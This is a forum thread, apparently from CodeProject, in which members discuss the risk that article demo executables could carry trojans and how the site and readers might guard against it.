Security consideration
-
Think about this scenario - someone signs up to codeproject using a gmail address and an arbitrary username. The person then posts an article about a new MFC control, for example a pure win32 Ribbon control that does not require any .net components. The source code contains intentional omissions that make it impossible to compile because the real objective is to get as many people as possible to download the demo executable and run it. The executable installs a trojan or SSH tunnel giving the author full access to the victims computer, allowing for theft of source code, documents, emails etc. Antivirus won't detect the break in, a personal firewall might, I guess it depends on how good the author is at coding. My point is - perhaps there is a rather wide open back door via article demo's - and I am in no way suggesting that it's the responsibility of codeproject to police uploads, just merely raising the concern.
This is an issue for any executable (and many non-executable) downloads on the internet, and is precisely the reason we do not allow downloads that do not contain source code. I've also see anti-virus software complain about demo downloads from CodeProject - not because the code contained a trojan, but because a trojan contained the code!
cheers, Chris Maunder The Code Project | Co-founder Microsoft C++ MVP
-
Think about this scenario - someone signs up to codeproject using a gmail address and an arbitrary username. The person then posts an article about a new MFC control, for example a pure win32 Ribbon control that does not require any .net components. The source code contains intentional omissions that make it impossible to compile because the real objective is to get as many people as possible to download the demo executable and run it. The executable installs a trojan or SSH tunnel giving the author full access to the victims computer, allowing for theft of source code, documents, emails etc. Antivirus won't detect the break in, a personal firewall might, I guess it depends on how good the author is at coding. My point is - perhaps there is a rather wide open back door via article demo's - and I am in no way suggesting that it's the responsibility of codeproject to police uploads, just merely raising the concern.
If someone were to ever try this, I bet the next CP contest would be to develop a botnet that would bury this guy so deep that the next three generations of his family wouldn't even be able to use a computer for as much as googling "When is this going to end?"
Brad Deja Moo - When you feel like you've heard the same bull before.
-
The best security is your own common sense. If a user is a very new member (none or very few posts, short membership and directly one article), it already is a "warning". Most things or article contents are quite difficult to follow just with a demo-app without the needed source, so if the source code doesn't compile... I just ignore the app.
Regards. -------- M.D.V. ;) If something has a solution... Why do we have to worry about?. If it has no solution... For what reason do we have to worry about? Help me to understand what I'm saying, and I'll explain it better to you Rating helpfull answers is nice, but saying thanks can be even nicer.
Nelek wrote:
The best security is your own common sense.
Then we are so totally screwed...
Christopher Duncan
www.PracticalUSA.com
Author of The Career Programmer and Unite the Tribes
Copywriting Services -
This is an issue for any executable (and many non-executable) downloads on the internet, and is precisely the reason we do not allow downloads that do not contain source code. I've also see anti-virus software complain about demo downloads from CodeProject - not because the code contained a trojan, but because a trojan contained the code!
cheers, Chris Maunder The Code Project | Co-founder Microsoft C++ MVP
...and the dog merrily chases his tail.
Christopher Duncan
www.PracticalUSA.com
Author of The Career Programmer and Unite the Tribes
Copywriting Services -
My point is the Norton/Endpoint with its realtime scanner and hueristics obviously did not detect these viruses to let them install themselves in these machines.
John
-
If someone were to ever try this, I bet the next CP contest would be to develop a botnet that would bury this guy so deep that the next three generations of his family wouldn't even be able to use a computer for as much as googling "When is this going to end?"
Brad Deja Moo - When you feel like you've heard the same bull before.
:laugh: :laugh: :thumbsup:
Regards. -------- M.D.V. ;) If something has a solution... Why do we have to worry about?. If it has no solution... For what reason do we have to worry about? Help me to understand what I'm saying, and I'll explain it better to you Rating helpfull answers is nice, but saying thanks can be even nicer.
-
It's not my choice. For the one laptop that is under my control we have an exclusive contract to use Endpoint. The others were home users.
John
-
digital man wrote:
Maybe demos should be banned (how would that work?)
By only having demos that are built by a trusted third party. A lot of work for the hamsters, though.
I wanna be a eunuchs developer! Pass me a bread knife!
Ah, bit like Escrow, perhaps? Not bad: I suppose it could be a paid service that would earn CP some more gazillions and would certainly weed out some of the more, how can I put it... not terribly well thought out articles.
Tychotics: take us back to the moon "Life, for ever dying to be born afresh, for ever young and eager, will presently stand upon this earth as upon a footstool, and stretch out its realm amidst the stars." H. G. Wells
-
A user of Code Project would (presumably) be presumed to be a developer. If you're reading an article, then you should at least be able to understand the content of the article and at least be at a level with the language it's in that you understand the demo you're about to download. I don't run code before reading through it and at least understanding where it's going, even if I don't understand all the concepts present. I also know enough networking code to spot it. If I try and build it and it doesn't work, I'll invariably delete it and mark the rating of the article one lower than I would have had the demo code worked as described by the article. I don't think it's a security risk, and I'm pretty sure a report of an article that had malicious content would be treated seriously and quickly by the admins on the site.
hammerstein05 wrote:
I don't think it's a security risk, and I'm pretty sure a report of an article that had malicious content would be treated seriously and quickly by the admins on the site.
What if you were the first to review the code?
John
-
It's not my choice. For the one laptop that is under my control we have an exclusive contract to use Endpoint. The others were home users.
John
-
hammerstein05 wrote:
I don't think it's a security risk, and I'm pretty sure a report of an article that had malicious content would be treated seriously and quickly by the admins on the site.
What if you were the first to review the code?
John
I was thinking more of a user reading the code and deeming the content to be malicious, than them actually running the content.If you were the first to read and you ran it without checking, then, whoops.